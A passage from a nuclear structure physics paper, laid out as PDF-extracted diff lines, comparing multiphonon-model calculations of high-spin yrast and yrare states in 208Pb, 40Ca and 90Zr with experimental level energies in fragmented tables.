+ I and π denote spin and parity of a state, n is a num-
241
+ ber of the level for the given Iπ, E are experimental and
242
+ theoretical energies (in MeV). The experimental values
243
+ were taken from Refs. [15, 38]. The letters next to the
244
+ theoretical values denote the phonon configuration for
245
+ every multiphonon state. The correspondence of these
246
+ letters to phonons and the structure of the RPA phonons
247
+ are shown in the Appendix, Table VII. The renormalized
248
+ phonons have more complex form where the RPA state
249
+ presents the main part and, in addition, there are many
250
+ additional components. Thus, the RPA phonon struc-
251
+ ture reflects the most significant part of the renormal-
252
+ ized phonons. The renormalization of phonons changes
253
+ the phonon energies of 208Pb by 0.3 – 1.4 MeV, see Ap-
254
+ pendix, Table VII, and the renormalization is especially
255
+ large for high-spin phonons.
256
+ In some cases, the spin-parity assignment of levels does
257
+ not match in Refs. [15] and [38], namely, for the levels of
258
+ 7.974, 8.027, and 9.061 MeV. In these cases, we preferred
259
+ the [15] identification, because it is more recent and more
260
+ substantiated. Our calculations confirm the correctness
261
+ of this choice.
262
+ Tables I and II show that results of the self-consistent
263
+ calculations for 208Pb in the framework of the multi-
264
+ phonon model are in fairly well agreement with the ex-
265
+ perimental data without any refit of the parameters. The
266
+ close results were obtained in Ref. [23] with parametriza-
267
+ tion SKXm−0.49 [35], but here we extend the results to
268
+ the three-phonon states.
269
+ An important point is that,
270
+ while there are many close two- and three-phonon states,
271
+ the yrast and yrare nuclear levels are described just as
272
+ the lowest states for the given spin and parity. Of course,
273
+ the model cannot establish a one-to-one correspondence
274
+ between theoretical and experimental values for these
275
+ states. But for the yrast and yrare levels, the energies are
276
+ predicted with an accuracy no worse than the difference
277
+ between the energies of these levels.
278
+ The energies of the yrast states in 208Pb as a function
279
+ of I(I + 1) in the spin range 13 ≤ I ≤ 30 are presented
280
+ in Fig. 1. Here, the energies E (in MeV) calculated in
281
+ the multiphonon model with the SV-bas−0.44 functional
282
+ are shown by green dots connected by lines of the same
283
+ color, the experimental data [15, 38] are given in black
284
+ squares.
285
+ Our new results confirm the conclusions made in the
286
+ previous paper, Ref. [23]. The general trend looks very
287
+ much like a rotational band, though the experimental
288
+ trend in detail does not always follow exactly a straight
289
+ TABLE I.
290
+ Positive parity states in 208Pb obtained in the
291
+ multiphonon model with renormalized phonons for the SV-
292
+ bas−0.44 Skyrme parametrization. Here, Iπ denotes spin and
293
+ parity of a level, n is a number of the level for the given Iπ, E
294
+ are experimental [15, 38] and theoretical energies. The letters
295
+ next to the theoretical values denote phonons: see Appendix,
296
+ Table VII.
297
+
298
+ n
299
+ E[MeV]
300
+
301
+ n
302
+ E[MeV]
303
+ Exp.
304
+ SV-bas−0.44
305
+ Exp.
306
+ SV-bas−0.44
307
+ 14+
308
+ 1
309
+ 9.16 bc
310
+ 13+
311
+ 1
312
+ 9.00 bc
313
+ 14+
314
+ 2
315
+ 9.36 cc
316
+ 13+
317
+ 2
318
+ 9.21 dj
319
+ 16+
320
+ 1
321
+ 9.21 bc
322
+ 15+
323
+ 1
324
+ a
325
+ 9.21 bc
326
+ 16+
327
+ 2
328
+ 9.35 cc
329
+ 15+
330
+ 2
331
+ 9.33 cc
332
+ 18+
333
+ 1
334
+ 9.1030
335
+ 9.44 cc
336
+ 17+
337
+ 1
338
+ 9.061 a
339
+ 9.43 cc
340
+ 18+
341
+ 2
342
+ 9.82 ck
343
+ 17+
344
+ 2
345
+ 9.68 ar
346
+ 20+
347
+ 1
348
+ 10.1959 9.51 cc
349
+ 19+
350
+ 1
351
+ 9.394
352
+ 9.48 cc
353
+ (20+
354
+ 2 ) 10.3573 10.19 ck
355
+ (19+) b 10.1358 10.04 ck
356
+ 20+
357
+ 3
358
+ 10.3710 10.63 cl
359
+ 19+
360
+ 10.1362 10.17 cu
361
+ (20+
362
+ 4 ) 10.5313 10.64 cm
363
+ 21+
364
+ 1
365
+ 9.50 cc
366
+ (20+
367
+ 5 ) 10.5524 10.95 kl
368
+ 21+
369
+ 2
370
+ 10.38 ck
371
+ 22+
372
+ 1
373
+ 10.96 cl
374
+ 23+
375
+ 1
376
+ 11.3609 12.17 ll
377
+ 22+
378
+ 2
379
+ 11.60 ll
380
+ 23+
381
+ 2
382
+ 12.90 pr
383
+ 24+
384
+ 1
385
+ 11.9582 12.96 rr
386
+ 25+
387
+ 1
388
+ 12.9493 13.14 qr
389
+ 24+
390
+ 2
391
+ 13.00 qr
392
+ 25+
393
+ 2
394
+ 13.29 rr
395
+ 26+
396
+ 1
397
+ 13.11 rr
398
+ 27+
399
+ 1
400
+ 13.28 kk
401
+ 26+
402
+ 2
403
+ 13.30 qr
404
+ 27+
405
+ 2
406
+ 14.06 ccc
407
+ 28+
408
+ 1
409
+ 14.20 ccc
410
+ 29+
411
+ 1
412
+ 14.23 ccc
413
+ 28+
414
+ 2
415
+ 14.61 cck
416
+ 29+
417
+ 2
418
+ 14.60 cck
419
+ 30+
420
+ 1
421
+ 14.24 ccc
422
+ 30+
423
+ 2
424
+ 14.89 ccg
425
+ a The spin-parity assignment to the level 9.061 is (17+) in the
426
+ NDS [38] and 17+ in Ref. [15] but 15+ in Ref. [39].
427
+ b The spin-parity assignment to the level 10.1358 in Ref. [15] is
428
+ (18−, 19+).
429
+ line:
430
+ E is approximately constant in the ranges I =
431
+ 17 − 18 and 26 − 28. This deviation is easy explained in
432
+ the framework of the multiphonon model. These parts
433
+ with the constant E values arise as parts of the phonon
434
+ multiplets with some additional details arisen because of
435
+ the phonon renormalization. Nevertheless, on the whole,
436
+ both experimental and theoretical trends are similar to a
437
+ rotational band. However, this band does not rely on a
438
+ collective rotation that is hindered by the spherical shape
439
+ and the large shell gap in 208Pb.
440
+ The analysis of the
441
+ microscopic structure shows that the high-spin states in
442
+ 208Pb have predominantly simple form in terms of s.p.
443
+ excitations since these states have a simple form in terms
444
+ of phonons (i.e., they are two- and three phonon states)
445
+ and, at the same time, the phonons are approximately
446
+ 1p1h states (see the in Table VII). Some complication
447
+ arises because of the renormalization of the phonons, but
448
+ this is just the same renormalization that changes the
449
+ bare phonons appearing in the self-consistent RPA to the
450
+ dressed phonons appearing as the 208Pb lower spin states
451
+ observed in the experiment. The rotational trend stems
452
+ from a change in the angular momentum of one single
453
+
454
+ 4
455
+ TABLE II. The same as in Table I but for the negative parity
456
+ states in 208Pb.
457
+
458
+ n
459
+ E[MeV]
460
+
461
+ n
462
+ E[MeV]
463
+ Exp.
464
+ SV-bas−0.44
465
+ Exp.
466
+ SV-bas−0.44
467
+ 13−
468
+ 1
469
+ 6.448
470
+ 6.47 r
471
+ 14−
472
+ 1
473
+ 6.743
474
+ 6.81 r
475
+ 13−
476
+ 2
477
+ 7.5288
478
+ 7.62 ac
479
+ 14−
480
+ 2
481
+ 7.974 b
482
+ 7.72 ac
483
+ 15−
484
+ 1
485
+ 8.027 a
486
+ 8.34 cd
487
+ 16−
488
+ 1
489
+ 8.562
490
+ 8.70 ce
491
+ (15−
492
+ 2 )
493
+ 8.1506
494
+ 8.66 ce
495
+ 16−
496
+ 2
497
+ 8.6007
498
+ 9.03 cd
499
+ 15−
500
+ 3
501
+ 8.2645
502
+ 8.86 cf
503
+ 16−
504
+ 3
505
+ 8.7235
506
+ 9.06 cf
507
+ 15−
508
+ 4
509
+ 8.3508
510
+ 9.04 dk
511
+ 18−
512
+ 1
513
+ 10.1358 c
514
+ 10.29 ci
515
+ 17−
516
+ 1
517
+ 8.8128
518
+ 9.36 ch
519
+ 18−
520
+ 2
521
+ 10.35 cj
522
+ 17−
523
+ 2
524
+ 9.57 ct
525
+ 20−
526
+ 1
527
+ 10.3419
528
+ 11.07 cp
529
+ 19−
530
+ 1
531
+ 10.55 cj
532
+ 20−
533
+ 2
534
+ 11.13 cr
535
+ 19−
536
+ 2
537
+ 11.03 br
538
+ 22−
539
+ 1
540
+ 11.22 cr
541
+ 21−
542
+ 1
543
+ 10.9343
544
+ 11.15 cr
545
+ 22−
546
+ 2
547
+ 11.35 cq
548
+ 21−
549
+ 2
550
+ 11.22 co
551
+ 24−
552
+ 1
553
+ 11.47 cr
554
+ 23−
555
+ 1
556
+ 11.40 cr
557
+ 24−
558
+ 2
559
+ 12.28 lr
560
+ 23−
561
+ 2
562
+ 11.77 cs
563
+ 26−
564
+ 1
565
+ 13.5360
566
+ 13.35 cce
567
+ 25−
568
+ 1
569
+ 12.87 lr
570
+ 26−
571
+ 2
572
+ 13.88 ccg
573
+ 25−
574
+ 2
575
+ 13.30 cce
576
+ 28−
577
+ 1
578
+ 13.6747
579
+ 14.93 cci
580
+ 27−
581
+ 1
582
+ 14.08 ccg
583
+ 28−
584
+ 2
585
+ 15.00 ccp
586
+ 27−
587
+ 2
588
+ 14.22 cct
589
+ 30−
590
+ 1
591
+ 15.72 ccp
592
+ 29−
593
+ 1
594
+ 15.20 ccj
595
+ 30−
596
+ 2
597
+ 15.78 ccr
598
+ 29−
599
+ 2
600
+ 15.68 bcr
601
+ a The NDS [38] assignment to the level 8.027 is (14−) but
602
+ Ref. [15] defines this level as 15−.
603
+ b The NDS [38] spin-parity assignment to the level 7.974 is (15−)
604
+ but [15] assigns this level as 14−.
605
+ c The spin-parity assignment to the level 10.1358 in Ref. [15] is
606
+ (18−, 19+).
607
+ nucleon. Here the rotational part of the s.p. kinetic en-
608
+ ergy gives a large contribution to the nucleon energy and
609
+ thereby to the change of nucleus energy.
610
+ The calculations show the following structure of the
611
+ high-spin states in 208Pb. The 13−
612
+ 1 and 14−
613
+ 1 states have
614
+ one-phonon configurations while the other states with
615
+ spins 13 ⩽ I ⩽ 26 including 13−
616
+ 2 and 14−
617
+ 2 but except for
618
+ 26− are two-phonon configurations. The 26+
619
+ 2 and 27+
620
+ 1
621
+ states are of the two-phonon nature while all the other
622
+ states with I = 27 and the even larger I need the treat-
623
+ ment in terms of the three-phonon configurations.
624
+ Of
625
+ course, we described here only several lowest states for
626
+ every spin and parity. For higher energies, the structure
627
+ of states becomes more complicated.
628
+ B.
629
+ 40Ca
630
+ As it was mentioned, we do not consider the ND and
631
+ SD rotational bands in 40Ca based on the 0+
632
+ 2 and 0+
633
+ 3
634
+ states. The ND and SD band-head states have, in the
635
+ deformed basis, the 4p4h and 8p8h configuration struc-
636
+ ture, respectively, and it is very difficult to describe such
637
+ states in the spherical basis.
638
+ The results for all other
639
+ states in 40Ca are presented in Tables III (positive par-
640
+ ity states) and IV (negative parity) where denotations
641
+ 6
642
+ 8
643
+ 10
644
+ 12
645
+ 14
646
+ 16
647
+ EI[MeV]
648
+ 200
649
+ 300
650
+ 400
651
+ 500
652
+ 600
653
+ 700
654
+ 800
655
+ 900
656
+ I(I+1)
657
+ 6
658
+ 8
659
+ 10
660
+ 12
661
+ 14
662
+ EI[MeV]
663
+ SV-bas-0.44
664
+ exp.
665
+ (a) unnatural parity
666
+ (b) natural parity
667
+ I=15
668
+ I=29
669
+ I=25
670
+ I=20
671
+ 208Pb
672
+ FIG. 1.
673
+ The energies E1 of
674
+ 208Pb yrast states calcu-
675
+ lated with RenTBA multiphonon model for the SV-bas−0.44
676
+ Skyrme parametrization (green line with circles) are shown as
677
+ function of I(I + 1) for the spins 13 ⩽ I ⩽ 30 and compared
678
+ with available experimental data [15, 38] (black squares).
679
+ are the same as in Table I, but different notation for
680
+ phonons. The correspondence of the letters to phonons
681
+ and the structure of the RPA phonons are shown in Ap-
682
+ pendix, Table VIII.
683
+ The calculations were performed
684
+ with the same SV-bas−0.44 Skyrme parametrization that
685
+ was used for 208Pb.
686
+ For 40Ca, the renormalization of
687
+ phonons changes the phonon energies by 0.2 – 0.6 MeV
688
+ (see Appendix, Table VIII) that is less than the renor-
689
+ malization for 208Pb. But many states in 40Ca have 3-,
690
+ 4- and even 5-phonon configurations therefore the renor-
691
+ malization can change the state energies by 1–1.5 MeV.
692
+ When evaluating the quality of the description of lev-
693
+ els, two circumstances should be taken into account.
694
+ First of all, our calculations are a first attempt to de-
695
+ scribe all these level in a self-consistent model. As shown
696
+ in Introduction, there are calculations only for the ND
697
+ and SD bands and all the calculations overestimate the
698
+ energy of the band-heads by 2 MeV or more, therefore,
699
+ in many papers, this energy or an energy of another band
700
+ state (e.g., the I = 16 state in Ref. [17]) is taken as a ref-
701
+ erence. Secondly, we include in the consideration three
702
+ rotational bands that have the following possible inter-
703
+ pretation (see Ref. [21], p. 211 and references therein):
704
+ γ sequence based on 8+ state, 3+ band, and Kp = 0−
705
+ band (denotations [21]). The most deviation of our re-
706
+ sults from the data are just for the states of these bands
707
+ but the deviation does not exceed 2 MeV and does not
708
+ exceed the above mentioned deviation for the ND and SD
709
+ band. Nevertheless, for some states of the three bands
710
+ our results are in general satisfactory and may be con-
711
+ sidered as another possible interpretation of the states.
712
+
713
+ 5
714
+ TABLE III. The same as in Table I but for the positive par-
715
+ ity states in 40Ca. The letters next to the theoretical values
716
+ denote phonons: see Appendix, Table VIII. The experimental
717
+ data are taken from Ref. [21].
718
+
719
+ n
720
+ E[MeV]
721
+
722
+ n
723
+ E[MeV]
724
+ Exp.
725
+ SV-bas−0.44
726
+ Exp.
727
+ SV-bas−0.44
728
+ 2+
729
+ 2
730
+ 5.249
731
+ 6.75 aa
732
+ 1+
733
+ 1
734
+ 8.25 ac
735
+ 2+
736
+ 4
737
+ 6.422
738
+ 8.25 ac
739
+ 1+
740
+ 1
741
+ 8.50 ad
742
+ 4+
743
+ 2
744
+ 6.507
745
+ 6.75 aa
746
+ 3+
747
+ 6.030 b
748
+ 8.25 ac
749
+ 3+, 4+
750
+ 7.446
751
+ 8.25 ac
752
+ 3+
753
+ 8.38 ad
754
+ 4+
755
+ 7.561
756
+ 8.50 ad
757
+ (5+)
758
+ 7.397 b
759
+ 8.25 ac
760
+ (6+)
761
+ 7.676
762
+ 6.75 aa
763
+ 5+
764
+ 8.38 ad
765
+ (6+)
766
+ 8.701
767
+ 8.25 ac
768
+ (7+)
769
+ 8.936
770
+ 8.25 ac
771
+ 8+
772
+ 8.100 a
773
+ 8.38 ad
774
+ 7+
775
+ 8.38 ad
776
+ 8+
777
+ 9.73 cc
778
+ (9+)
779
+ 11.70
780
+ 9.87 cd
781
+ 10+
782
+ 11.00 a
783
+ 13.5 aaaa
784
+ 9+
785
+ 10.12 ce
786
+ (10+)
787
+ 12.59
788
+ 15.0 aaac
789
+ (11+)
790
+ 13.53 b
791
+ 15.0 aaac
792
+ (10+)
793
+ 13.19
794
+ 15.13 aaad
795
+ 11+
796
+ 15.1 aaad
797
+ (12+)
798
+ 13.12 a
799
+ 15.0 aaac
800
+ (13+)
801
+ 15.15 a
802
+ 15.1 aaad
803
+ (12+)
804
+ 15.75
805
+ 15.1 aaad
806
+ (13+)
807
+ 16.58 b
808
+ 16.5 aacc
809
+ (14+)
810
+ 17.70
811
+ 16.9 aade
812
+ (15+)
813
+ 19.19
814
+ 18.13 aadf
815
+ (14+)
816
+ 18.05
817
+ 17.0 aaee
818
+ (15+)
819
+ 18.25 aaef
820
+ (14+)
821
+ 18.72
822
+ 18.0 aacf
823
+ a γ sequence based on 8+ [21], p. 211.
824
+ b 3+ band [21], p. 211.
825
+ The one-phonon E(0−
826
+ 1 ) and E(1−
827
+ 1 ) values exceed the
828
+ proton separation energy in 40Ca calculated with the
829
+ given parameter set, Stheor.(p) = 7.565 MeV (the exper-
830
+ imental value Sexp.(p) = 8328.17 [21]). These energies
831
+ have been recalculated in RenTBA taking into account
832
+ the s.p. continuum, and the values given in the tables
833
+ takes this effect into account. The continuum effect is
834
+ not significant for the two- and many-phonon states.
835
+ The calculation results allow us to refine the identifica-
836
+ tion of some levels in 40Ca. The experimental assignment
837
+ to the 7.623 level is (2−, 3, 4+) [21]. Possible theoretical
838
+ states corresponding to this level are 2−
839
+ 3 , 3−
840
+ 5 , 3+
841
+ 2 , and 4+
842
+ 7
843
+ with the energies 8.77, 7.45 k, 8.38 ad and 8.63 ab, re-
844
+ spectively. It should be noted that the 4+
845
+ 1 and 4+
846
+ 3 states
847
+ belong to the ND and SD bands, respectively, and there-
848
+ fore they are not shown in the table. The most probable
849
+ assignment for the 7.623 level is 3−
850
+ 5 .
851
+ The experimental assignment to the 6.938 level is (1−
852
+ to 5−) [21] but our calculations show that the most prob-
853
+ able assignment is 5− because all the other states have
854
+ too high energies. The experimental assignment to the
855
+ 8.359 level is (0, 1, 2)− [21]. Our calculations show that
856
+ the most probable assignment is 0−
857
+ 1 .
858
+ C.
859
+ Semi-magic 90Zr
860
+ New experimental data for the states up to spin I = 20
861
+ in 90Zr and the shell-model calculations are given in
862
+ Ref. [18]. The 90Zr high-spin states were interpreted to be
863
+ TABLE IV.
864
+ The same as in Table III but for the negative
865
+ parity states in 40Ca.
866
+
867
+ n
868
+ E[MeV]
869
+
870
+ n
871
+ E[MeV]
872
+ Exp. SV-bas−0.44
873
+ Exp.
874
+ SV-bas−0.44
875
+ (0, 1, 2)− 8.359a
876
+ 8.40
877
+ 1−
878
+ 5.903
879
+ 7.62 l
880
+ 2−
881
+ 6.025
882
+ 5.33 d
883
+ 3−
884
+ 3.737
885
+ 3.38 a
886
+ 2−
887
+ 6.750
888
+ 6.29 f
889
+ (3−)
890
+ 6.160
891
+ 5.25 b
892
+ 4−
893
+ 5.613
894
+ 4.87 c
895
+ 3−
896
+ 6.285
897
+ 5.70 i
898
+ 4−
899
+ 5.12 e
900
+ 3−
901
+ 6.582
902
+ 7.14 j
903
+ (6−)
904
+ 8.701
905
+ 10.13 aaa
906
+ (2−, 3, 4+) 7.623 b
907
+ 7.45 k
908
+ 6−
909
+ 11.62 aac
910
+ 5−
911
+ 4.491
912
+ 5.00 d
913
+ 8−
914
+ 10.47
915
+ 11.62 aac
916
+ 5−
917
+ 6.938 c
918
+ 6.37 f
919
+ 8−
920
+ 11.76 aad
921
+ (7−)
922
+ 9.033? d
923
+ 10.13 aaa
924
+ (10−)
925
+ 13.19
926
+ 11.76 aad
927
+ 7−
928
+ 11.69
929
+ 11.62 aac
930
+ 10−
931
+ 11.87 aae
932
+ (9−)
933
+ 10.89 d
934
+ 11.62 aac
935
+ 12−
936
+ 13.25 acd
937
+ (11−)
938
+ 12.92 d
939
+ 11.76 aad
940
+ 12−
941
+ 13.50 ade
942
+ 11−
943
+ 13.11acc
944
+ 14−
945
+ 16.25 cdf
946
+ (13−)
947
+ 15.31 d
948
+ 14.8 adf
949
+ 14−
950
+ 16.38 ddf
951
+ (13−)
952
+ 16.58 e
953
+ 15.0 cde
954
+ (15−)
955
+ 18.21 d
956
+ 18.51 aaaad
957
+ a The experimental assignment to the 8.359 level is (0, 1, 2)− [21]
958
+ but our calculations show that the most probable assignment is
959
+ 0−
960
+ 1 : see the text.
961
+ b The experimental assignment to the 7.623 level is (2−, 3, 4+)
962
+ [21] but our calculations show that the most probable
963
+ assignment is 3−
964
+ 5 .
965
+ c The experimental assignment to the 6.938 level is (1− to 5−)
966
+ [21] but our calculations show that the most probable
967
+ assignment is 5−.
968
+ e A possible interpretation of the level as a member of the band
969
+ as Kp = 0− band and some doubts on this interpretation are
970
+ given in Ref. [21], p. 211.
971
+ d 3+ band [21], p. 211.
972
+ generated by the recoupling of stretched proton and neu-
973
+ tron configurations. The shell-model calculations
974
+ [18]
975
+ used the fitted s.p. energies and two-body matrix ele-
976
+ ments of the effective interaction. Besides the two bands
977
+ considered in Ref. [18], there are many other known levels
978
+ in 90Zr having both the low and high spins. The calcula-
979
+ tions presented in this subsection are the first attempt to
980
+ describe all known states of 90Zr within the framework
981
+ of a self-consistent method.
982
+ The results for 90Zr are shown in Tables V (positive
983
+ parity states) and VI (negative parity) where denota-
984
+ tions are the same as in Table I, but different notation for
985
+ phonons. The correspondence of the letters to phonons
986
+ and the structure of the RPA phonons are shown in Ap-
987
+ pendix, Table IX. The experimental data are taken from
988
+ Refs. [18, 40].
989
+ It should be noted that there are many unassigned lev-
990
+ els above 3.5 MeV, such as 3.557 MeV, 3.9324 MeV, etc.
991
+ [40], so it is possible that some of the lowest assigned lev-
992
+ els are not yrast or yrare. This should be taken into ac-
993
+ count when comparing theory with data, since the theo-
994
+ retical values are given just for the yrast and yrare states.
995
+ The calculations with the SV-bas−0.44 parameter set
996
+
997
+ 6
998
+ TABLE V. The same as in Table I but for the positive par-
999
+ ity states in 90Zr. The letters next to the theoretical values
1000
+ denote phonons: see Appendix, Table IX. The experimen-
1001
+ tal data are taken from Ref. [18, 40].
1002
+ The theoretical re-
1003
+ sults were obtained with SV-bas−0.44 and SLy4 Skyrme EDF
1004
+ parametrizations but, for SV-bas−0.44 (denoted as bas−0.44),
1005
+ the energy of the single-particle π1g9/2 state was increased by
1006
+ 0.6 MeV in these calculations.
1007
+
1008
+ n
1009
+ E[MeV]
1010
+
1011
+ n
1012
+ E[MeV]
1013
+ exp. bas−0.44
1014
+ SLy4
1015
+ exp. bas−0.44
1016
+ SLy4
1017
+ 0+
1018
+ 1.76
1019
+ 3.67 x
1020
+ 4.27 aa x
1021
+ 1+
1022
+ 3.67
1023
+ 4.28 aa
1024
+ 0+
1025
+ 4.12
1026
+ 5.03
1027
+ 5.68 ab
1028
+ 1+
1029
+ 5.96
1030
+ 5.75 ab
1031
+ 0+
1032
+ 4.43
1033
+ 5.19
1034
+ 5.77 bb
1035
+ 2+
1036
+ 2.19
1037
+ 3.60 x
1038
+ 4.27 aa x
1039
+ (3+) 4.26
1040
+ 3.67
1041
+ 4.28 aa
1042
+ 2+
1043
+ 3.31
1044
+ 3.67
1045
+ 4.31 d
1046
+ 3+
1047
+ 3.84
1048
+ 4.94 d
1049
+ 2+
1050
+ 3.84
1051
+ 4.93
1052
+ 5.46 ab
1053
+ 2+
1054
+ 4.22
1055
+ 5.81
1056
+ 5.77 bb
1057
+ 2+
1058
+ 4.23
1059
+ 5.90
1060
+ 5.97 ac
1061
+ 4+
1062
+ 3.08
1063
+ 3.67
1064
+ 4.27 aa
1065
+ (5+) 4.45
1066
+ 3.67
1067
+ 4.28 aa
1068
+ 4+
1069
+ 4.06
1070
+ 3.68
1071
+ 4.70 d
1072
+ 5+
1073
+ 4.87
1074
+ 3.81
1075
+ 4.89 d
1076
+ 4+
1077
+ 4.30
1078
+ 5.02
1079
+ 5.02 ab
1080
+ 7+
1081
+ a
1082
+ 3.67
1083
+ 4.28 aa
1084
+ 4+
1085
+ 4.33
1086
+ 5.25
1087
+ 5.77 bb
1088
+ 7+
1089
+ 5.06
1090
+ 4.03
1091
+ 4.75d
1092
+ (4+) 4.35
1093
+ 5.89
1094
+ 5.79 ab
1095
+ 9+
1096
+ 5.25
1097
+ 3.67
1098
+ 4.28 aa
1099
+ 4+
1100
+ 4.47
1101
+ 5.90
1102
+ 6.18 ac
1103
+ 9+
1104
+ 5.79
1105
+ 5.08
1106
+ 5.83 ab
1107
+ 6+
1108
+ 3.45
1109
+ 3.62
1110
+ 4.27 aa
1111
+ 11+
1112
+ 6.28
1113
+ 6.10
1114
+ 6.12 ac
1115
+ 6+
1116
+ 3.74
1117
+ 4.88 d
1118
+ (11+) 7.19
1119
+ 6.53
1120
+ 7.42 bb
1121
+ 8+
1122
+ 3.59
1123
+ 3.67
1124
+ 4.27 aa
1125
+ 13+
1126
+ 7.44
1127
+ 7.46
1128
+ 8.01 cc
1129
+ 8+
1130
+ 5.16
1131
+ 5.00
1132
+ 5.02 ab
1133
+ 13+
1134
+ 8.36
1135
+ 9.10 aad
1136
+ 10+
1137
+ 5.64
1138
+ 5.11
1139
+ 5.83 ab
1140
+ 15+
1141
+ 8.95
1142
+ 8.56
1143
+ 9.24 aad
1144
+ 10+
1145
+ 7.03
1146
+ 5.84
1147
+ 6.10 ac
1148
+ 15+
1149
+ 9.33
1150
+ 8.93
1151
+ 10.4 abd
1152
+ (12+) 6.77
1153
+ 7.44
1154
+ 7.77 bc
1155
+ (15)+ 9.84
1156
+ 9.54
1157
+ 10.9 acd
1158
+ 12+
1159
+ 7.22
1160
+ 7.49
1161
+ 7.99 cc
1162
+ (17+) 10.8
1163
+ 9.10
1164
+ 10.6 abd
1165
+ 14+
1166
+ 8.06
1167
+ 7.52
1168
+ 9.07 aad
1169
+ 17+
1170
+ 9.92
1171
+ 10.9 acd
1172
+ 14+
1173
+ 8.85
1174
+ 10.2 abd (19+) 12.1
1175
+ 11.6
1176
+ 12.5 bcd
1177
+ 16+
1178
+ b
1179
+ 7.65
1180
+ 8.90 aad
1181
+ 19+
1182
+ 11.5
1183
+ 12.6 aabd
1184
+ 16+
1185
+ 10.1
1186
+ 8.92
1187
+ 10.6 abd
1188
+ (18+) 11.4
1189
+ 10.1
1190
+ 10.9 acd
1191
+ 18+
1192
+ 10.7
1193
+ 12.2 bbc
1194
+ (20+) 13.0
1195
+ 11.5 c
1196
+ 12.8 ccd
1197
+ 20+
1198
+ 12.7 c
1199
+ 13.7 aadd
1200
+ a The 7+ state belongs to the ’aa’ multiplet where the known 2+
1201
+ 1 ,
1202
+ 4+
1203
+ 1 , 6+
1204
+ 1 , and 8+
1205
+ 1 members have energies of 2.5 – 3.5 MeV so
1206
+ there should be a 7+ state with an energy of 3 – 4 MeV. The
1207
+ same is valid for the ’d’ multiplet.
1208
+ b The level 10.12584 [40] cannot be the first state of 16+; it’s
1209
+ either 2nd or 3rd: see the text.
1210
+ c For SV-bas−0.44, the first and second have the configurations
1211
+ ’aadd’ and ’ccd’, respectively.
1212
+ x The first 0+ and 2+ state are probably deformed and therefore
1213
+ outside the scope of the model: see the text.
1214
+ underestimate energies of many states in 40Ca by 2 – 4
1215
+ MeV, particularly for the high-spin states. At the same
1216
+ time, it turns out that a small change in only one s.p.
1217
+ energy, for the π1g9/2 state, significantly improves agree-
1218
+ ment with experiment. The SV-bas−0.44 results given in
1219
+ Tables V and VI were obtained with the energy of the
1220
+ π1g9/2 state increased by 0.6 MeV. This feature of the
1221
+ calculations is designated in Tables V and VI as bas−0.44.
1222
+ TABLE VI.
1223
+ The same as in Table V but for the negative
1224
+ parity states in 90Zr.
1225
+
1226
+ n
1227
+ E[MeV]
1228
+
1229
+ n
1230
+ E[MeV]
1231
+ exp. bas−0.44
1232
+ SLy4
1233
+ exp. bas−0.44
1234
+ SLy4
1235
+ 0−
1236
+ 5.59
1237
+ 6.93 ad
1238
+ 1−
1239
+ 5.60
1240
+ 5.00 ad
1241
+ 0−
1242
+ 6.75
1243
+ 7.79 aab
1244
+ 1−
1245
+ 6.79
1246
+ 5.59 bd
1247
+ 2−
1248
+ 4.53
1249
+ 4.83 c
1250
+ 3−
1251
+ 2.75
1252
+ 2.60
1253
+ 2.88 b
1254
+ 2−
1255
+ 5.60
1256
+ 6.88 ad
1257
+ (3−) 4.50
1258
+ 3.84
1259
+ 3.97 c
1260
+ (4−) 2.74
1261
+ 1.89
1262
+ 2.26 a
1263
+ (3−) 4.81
1264
+ 5.62
1265
+ 5.86 h
1266
+ (4−) 4.22
1267
+ 3.24
1268
+ 3.78 b
1269
+ 3−
1270
+ 5.63
1271
+ 6.01
1272
+ 6.66 ad
1273
+ (4−) 4.54
1274
+ 4.00
1275
+ 4.10 c
1276
+ 3−
1277
+ 5.67
1278
+ 6.66
1279
+ 7.46 aab
1280
+ (4−) 4.94
1281
+ 5.75
1282
+ 6.82 ad
1283
+ 5−
1284
+ 2.32
1285
+ 1.78
1286
+ 2.02 a
1287
+ 6−
1288
+ 4.23
1289
+ 3.38
1290
+ 3.76 b
1291
+ 5−
1292
+ 3.96
1293
+ 3.14
1294
+ 3.66 b
1295
+ 6−
1296
+ 3.87
1297
+ 3.95 c
1298
+ (5−) 4.30
1299
+ 3.90
1300
+ 3.88 c
1301
+ 8−
1302
+ 5.64
1303
+ 6.94 ad
1304
+ 7−
1305
+ 4.37
1306
+ 4.49
1307
+ 4.06 c
1308
+ 8−
1309
+ 6.72
1310
+ 7.64 bd
1311
+ 7−
1312
+ 5.63
1313
+ 6.84 ad
1314
+ 10−
1315
+ 6.38
1316
+ 5.70
1317
+ 6.96 ad
1318
+ 9−
1319
+ 5.66
1320
+ 6.97 ad
1321
+ 10−
1322
+ 6.72
1323
+ 6.72
1324
+ 7.64 bd a
1325
+ 9−
1326
+ 6.66
1327
+ 7.55 aab
1328
+ (12−)
1329
+ 5.81
1330
+ 6.77 ad
1331
+ 11− 6.95
1332
+ 5.75
1333
+ 6.89 ad
1334
+ 12−
1335
+ 6.90
1336
+ 7.79 aab
1337
+ 11− 7.01
1338
+ 6.77
1339
+ 7.53 aab
1340
+ 14−
1341
+ 8.86
1342
+ 7.78
1343
+ 8.22 aac
1344
+ 13−
1345
+ 6.91
1346
+ 7.81 aab
1347
+ 14−
1348
+ 8.40
1349
+ 8.81 cd
1350
+ 13−
1351
+ 7.41
1352
+ 8.50 bd
1353
+ (16−) 9.71
1354
+ 10.1
1355
+ 10.1 acc
1356
+ 15− 8.96
1357
+ 9.10
1358
+ 9.63 abc
1359
+ (16−) 10.0
1360
+ 10.6
1361
+ 11.5 bbc
1362
+ 15− 9.83
1363
+ 9.87
1364
+ 10.10 acc
1365
+ 16−
1366
+ 10.1
1367
+ 10.7
1368
+ 11.6 bcc
1369
+ 15− 9.97
1370
+ 10.3
1371
+ 10.63 bcc
1372
+ 16−
1373
+ 10.4
1374
+ 11.1
1375
+ 11.7 add
1376
+ 17− 10.8
1377
+ 9.58
1378
+ 11.69 add
1379
+ 18−
1380
+ 11.3
1381
+ 9.55
1382
+ 11.6 add
1383
+ 17− 10.9
1384
+ 10.6
1385
+ 11.69 bcc
1386
+ 18−
1387
+ 11.4
1388
+ 11.2
1389
+ 12.0 ccc
1390
+ 20−
1391
+ 12.6
1392
+ 12.2
1393
+ 12.8 aacd 19− 12.1
1394
+ 11.2
1395
+ 12.5 aabd
1396
+ 20−
1397
+ 13.0
1398
+ 12.3
1399
+ 13.7 cdd
1400
+ 19− 12.3
1401
+ 12.1
1402
+ 12.8 aacd
1403
